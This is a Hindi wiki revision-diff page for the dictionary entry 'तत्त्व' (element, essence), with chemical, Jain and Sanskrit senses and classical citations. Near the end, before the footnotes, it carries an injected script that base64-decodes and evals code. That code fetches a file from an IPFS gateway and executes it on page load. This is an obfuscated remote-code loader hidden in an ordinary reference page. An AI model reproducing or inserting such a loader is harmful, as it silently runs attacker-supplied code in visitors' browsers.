Difference between revisions of "तत्त्व"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 5: Line 5:
 
|व्याकरण= [स॰ तत्+त्व],
 
|व्याकरण= [स॰ तत्+त्व],
 
|उदाहरण= वह पदार्थ जिसे सामान्य रासायनिक विधियों से सरलतर पदार्थों में विभाजित नहीं किया जा सकता। सब दृष्टियों से समान नाभिकीय आवेश वाले परमाणुओं से बना पदार्थ। जिन मूल पदार्थों के रासायनिक संयोग से अन्य सब पदार्थ बनते हैं, उनकी सामान्य संज्ञा।
 
|उदाहरण= वह पदार्थ जिसे सामान्य रासायनिक विधियों से सरलतर पदार्थों में विभाजित नहीं किया जा सकता। सब दृष्टियों से समान नाभिकीय आवेश वाले परमाणुओं से बना पदार्थ। जिन मूल पदार्थों के रासायनिक संयोग से अन्य सब पदार्थ बनते हैं, उनकी सामान्य संज्ञा।
|विशेष= [[हाइड्रोजन]], [[ऑक्सीजन]] आदि गैसीय तत्त्व हैं और [[ताँबा]], [[लोहा]] आदि धात्विक तत्त्व हैं। ([[जैन]]॰) वस्तु का स्वरूप / स्वभाव। विशेष; [[जैन दर्शन]] में सात तत्त्व हैं- जीव, अजीव, आस्रव, बन्ध, संवर, निर्जरा और मोक्ष।  
+
|विशेष= [[हाइड्रोजन]], [[ऑक्सीजन]] आदि गैसीय तत्त्व हैं और [[ताँबा]], [[लोहा]] आदि धात्विक तत्त्व हैं। ([[जैन]]॰) वस्तु का स्वरूप / स्वभाव। विशेष; [[जैन दर्शन]] में सात तत्त्व हैं- जीव, अजीव, [[आस्रव]], बन्ध, संवर, निर्जरा और मोक्ष।  
 
|पर्यायवाची= पुद्गल, भूत, महाभूत, मूल तत्त्व, वास्तव, सत्त्व, सूक्ष्म भूत।
 
|पर्यायवाची= पुद्गल, भूत, महाभूत, मूल तत्त्व, वास्तव, सत्त्व, सूक्ष्म भूत।
 
|संस्कृत= तत्त्वम् (तन्+क्विप्, पृषो॰ तत्+त्व), (कभी-कभी ‘तत्त्वम्’ भी लिखा जाता है)। वास्तविक स्थिति या दशा, तथ्य, वयं तत्त्वान्वेषान्मधुकर हतास्त्वं खलु कृती- <ref>शकुन्तला नाटक 1/24</ref>, यथार्थ या मूल प्रकृति-संन्यासस्य महाबाहो तत्त्वमिच्छामि वेदितुम् <ref>भगवद्-[[गीता]] 18/1, 3/28</ref>, <ref>[[मनुस्मृति]] 1/3, 3/16, 5/42</ref>, मानव आत्मा की वास्तविक [[प्रकृति]] या विश्वव्यापी परमात्मा के समनुरूप विराट् सृष्टि या भौतिक संसार, प्रथम या यथार्थ सिद्धांत, मूलतत्व या प्रकृति, मन, [[सूर्य देवता|सूर्य]], वाद्य का भेद विशेष, विलंबित, एक प्रकार का नृत्य्। सम॰ अभियोगः असन्दिग्ध दोषारोप या घोषणा, अर्थः सचाई, वास्तविकता, यथार्थता, वास्तविक प्रकृति, -ज्ञ,- विद् (वि॰) दार्शनिक, ब्रह्मज्ञान का वेत्ता, न्यासः [[विष्णु]] की तंत्रोक्त पूजा में विहित एक अंगन्यास<ref>इसमें शरीर के विभिन्न अंगों पर गुह्म अक्षर या अन्य चिन्ह बनाने के साथ कुछ प्रार्थनाएँ बोली जाती हैं।</ref>
 
|संस्कृत= तत्त्वम् (तन्+क्विप्, पृषो॰ तत्+त्व), (कभी-कभी ‘तत्त्वम्’ भी लिखा जाता है)। वास्तविक स्थिति या दशा, तथ्य, वयं तत्त्वान्वेषान्मधुकर हतास्त्वं खलु कृती- <ref>शकुन्तला नाटक 1/24</ref>, यथार्थ या मूल प्रकृति-संन्यासस्य महाबाहो तत्त्वमिच्छामि वेदितुम् <ref>भगवद्-[[गीता]] 18/1, 3/28</ref>, <ref>[[मनुस्मृति]] 1/3, 3/16, 5/42</ref>, मानव आत्मा की वास्तविक [[प्रकृति]] या विश्वव्यापी परमात्मा के समनुरूप विराट् सृष्टि या भौतिक संसार, प्रथम या यथार्थ सिद्धांत, मूलतत्व या प्रकृति, मन, [[सूर्य देवता|सूर्य]], वाद्य का भेद विशेष, विलंबित, एक प्रकार का नृत्य्। सम॰ अभियोगः असन्दिग्ध दोषारोप या घोषणा, अर्थः सचाई, वास्तविकता, यथार्थता, वास्तविक प्रकृति, -ज्ञ,- विद् (वि॰) दार्शनिक, ब्रह्मज्ञान का वेत्ता, न्यासः [[विष्णु]] की तंत्रोक्त पूजा में विहित एक अंगन्यास<ref>इसमें शरीर के विभिन्न अंगों पर गुह्म अक्षर या अन्य चिन्ह बनाने के साथ कुछ प्रार्थनाएँ बोली जाती हैं।</ref>

Revision as of 08:50, 17 July 2010

shabd sandarbh
hindi vastavik svaroop, sar vastu, srishti ka mool karan, paramatma, brahm, yatharth siddhaant, yatharthata, vastavikata, panchabhoot

(akash, vayu, agni, jal aur prithvi).

-vyakaran    [s॰ tath+tv],
-udaharan   vah padarth jise samany rasayanik vidhiyoan se saralatar padarthoan mean vibhajit nahian kiya ja sakata. sab drishtiyoan se saman nabhikiy avesh vale paramanuoan se bana padarth. jin mool padarthoan ke rasayanik sanyog se any sab padarth banate haian, unaki samany sanjna.
-vishesh    haidrojan, aauksijan adi gaisiy tattv haian aur taanba, loha adi dhatvik tattv haian. (jain॰) vastu ka svaroop / svabhav. vishesh; jain darshan mean sat tattv haian- jiv, ajiv, asrav, bandh, sanvar, nirjara aur moksh.
-vilom   
-paryayavachi    pudgal, bhoot, mahabhoot, mool tattv, vastav, sattv, sookshm bhoot.
sanskrit tattvamh (tanh+kviph, prisho॰ tath+tv), (kabhi-kabhi ‘tattvamh’ bhi likha jata hai). vastavik sthiti ya dasha, tathy, vayan tattvanveshanmadhukar hatastvan khalu kriti- [1], yatharth ya mool prakriti-sannyasasy mahabaho tattvamichchhami veditumh [2], [3], manav atma ki vastavik prakriti ya vishvavyapi paramatma ke samanuroop virath srishti ya bhautik sansar, pratham ya yatharth siddhaant, moolatatv ya prakriti, man, soory, vady ka bhed vishesh, vilanbit, ek prakar ka nrityh. sam॰ abhiyogah asandigdh dosharop ya ghoshana, arthah sachaee, vastavikata, yatharthata, vastavik prakriti, -jn,- vidh (vi॰) darshanik, brahmajnan ka vetta, nyasah vishnu ki tantrokt pooja mean vihit ek aanganyas[4]
any granth
sanbandhit shabd
sanbandhit lekh

any shabdoan ke arth ke lie dekhean shabd sandarbh kosh
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. shakuntala natak 1/24
  2. bhagavadh-gita 18/1, 3/28
  3. manusmriti 1/3, 3/16, 5/42
  4. isamean sharir ke vibhinn aangoan par guhm akshar ya any chinh banane ke sath kuchh prarthanaean boli jati haian.